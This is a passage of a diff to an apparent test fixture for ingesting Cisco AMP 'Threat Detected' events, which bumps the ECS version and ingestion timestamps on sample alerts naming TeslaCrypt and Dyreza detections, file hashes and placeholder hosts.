                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":147000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196242\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1253,7 +1253,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1279,7 +1279,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:17.581753905Z",
+                "ingested": "2021-09-13T18:06:53.271919448Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":69000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196241\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1336,7 +1336,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1362,7 +1362,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:17.581755886Z",
+                "ingested": "2021-09-13T18:06:53.271921422Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":69000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196240\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1419,7 +1419,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1441,7 +1441,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:17.581757773Z",
+                "ingested": "2021-09-13T18:06:53.271923288Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259080131183000,\"timestamp\":1610705857,\"timestamp_nanoseconds\":996000000,\"date\":\"2021-01-15T10:17:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259080131182683\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1498,7 +1498,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1524,7 +1524,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:17.581759663Z",
+                "ingested": "2021-09-13T18:06:53.271925171Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251507855229000,\"timestamp\":1610705857,\"timestamp_nanoseconds\":944000000,\"date\":\"2021-01-15T10:17:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251507855228943\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1581,7 +1581,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1607,7 +1607,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:17.581761565Z",
+                "ingested": "2021-09-13T18:06:53.271927056Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251507855229000,\"timestamp\":1610705857,\"timestamp_nanoseconds\":8000000,\"date\":\"2021-01-15T10:17:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261641\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1664,7 +1664,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1690,7 +1690,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:17.581763451Z",
+                "ingested": "2021-09-13T18:06:53.271928939Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":821000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261640\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1756,7 +1756,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -1788,7 +1788,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:17.581765334Z",
+                "ingested": "2021-09-13T18:06:53.271930862Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261639\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":2712,\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1849,7 +1849,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1875,7 +1875,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:17.581767207Z",
+                "ingested": "2021-09-13T18:06:53.271932733Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261638\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1941,7 +1941,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -1973,7 +1973,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:17.581769170Z",
+                "ingested": "2021-09-13T18:06:53.271934727Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":680000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261637\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":2712,\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2034,7 +2034,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -2060,7 +2060,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:17.581771127Z",
+                "ingested": "2021-09-13T18:06:53.271936572Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":665000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261636\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2126,7 +2126,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -2158,7 +2158,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:17.581773027Z",
+                "ingested": "2021-09-13T18:06:53.271938451Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":509000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261635\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":3164,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\",\"sha1\":\"cea0890d4b99bae3f635a16dae71f69d137027b9\",\"md5\":\"8b88ebbb05a0e56b7dcc708498c02b3e\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2219,7 +2219,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -2241,7 +2241,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:17.581774895Z",
+                "ingested": "2021-09-13T18:06:53.271940356Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259028591575000,\"timestamp\":1610705845,\"timestamp_nanoseconds\":984000000,\"date\":\"2021-01-15T10:17:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259028591575130\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2307,7 +2307,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -2339,7 +2339,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:17.581776799Z",
+                "ingested": "2021-09-13T18:06:53.271942249Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251439135752000,\"timestamp\":1610705841,\"timestamp_nanoseconds\":455000000,\"date\":\"2021-01-15T10:17:21+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251439135752194\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":3164,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\",\